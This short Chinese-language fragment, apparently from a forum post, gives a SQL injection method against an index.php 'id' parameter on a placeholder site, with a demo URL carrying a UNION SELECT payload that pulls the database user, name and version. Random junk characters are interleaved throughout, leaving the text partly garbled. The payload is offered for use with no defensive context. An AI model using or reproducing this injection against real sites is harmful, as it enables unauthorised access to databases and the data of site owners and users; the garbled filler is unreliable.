利用方法:- r2 s7 j# t# w8 W; Y c
http://www.xxx.com/index.php?id=[SQL]- [+ k G- v! s2 j: X4 G1 o" }
Demo:& T7 \/ i2 ^" w% ^, n
http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |